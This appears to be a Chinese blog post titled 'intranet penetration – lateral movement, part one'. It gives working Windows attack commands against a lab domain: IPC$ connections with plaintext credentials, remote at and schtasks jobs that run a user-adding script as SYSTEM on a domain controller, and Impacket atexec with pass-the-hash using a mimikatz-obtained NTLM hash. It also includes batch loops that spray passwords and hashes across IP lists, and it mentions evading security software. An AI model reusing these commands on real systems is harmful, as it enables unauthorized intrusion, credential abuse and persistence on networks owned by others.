内网渗透-横向移动 一

at命令

使用限制是当前操作系统版本小于2012

先建立一个连接

net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\administrator # 建立 ipc 连接


复制添加用户的批处理脚本到域控的C盘下

copy add.bat \\192.168.30.7\c$

at \\192.168.3.21 15:47 c:\add.bat #添加计划任务


写添加账户命令的时候要注意密码规则


有可能会因为密码不符合规则或者密码太长导致命令执行失败


schtasks命令

适用于大于等于2012的操作系统

也是和at命令一样建立ipc连接 然后上传adduser的bat脚本到目标机器C盘下

schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #创建 adduser 任务

对应执行文件


如果一直没有响应可能是IP错了

schtasks /run /s 192.168.3.32 /tn adduser /i #运行 adduser 任务



schtasks /delete /s 192.168.3.21 /tn adduser /f      #删除 adduser 任务


atexec 第三方工具

缺点:如果目标机器有安全狗或者其他的waf容易被查杀报警  需要做免杀  没有Windows自带的工具好 有点就是功能多 有回显

atexec.exe ./administrator:[email protected] "ipconfig"



也可以用hash连接

atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./[email protected] "whoami"

hhash可以用mimikatz获取

批量检测明文或hash

这个应该算是爆破了吧

FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator #批量检测 IP 对应明文

连接

FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #批量检测 IP 对应明文

回显版

FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%[email protected] whoami #批量检测明文对应 IP

回显版

FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./[email protected] whoami #批量检测

HASH 对应 IP 回显版

也可以用python写爆破的脚本 然后打包成exe可以免py环境运行

你可能感兴趣的:(内网渗透-横向移动 一)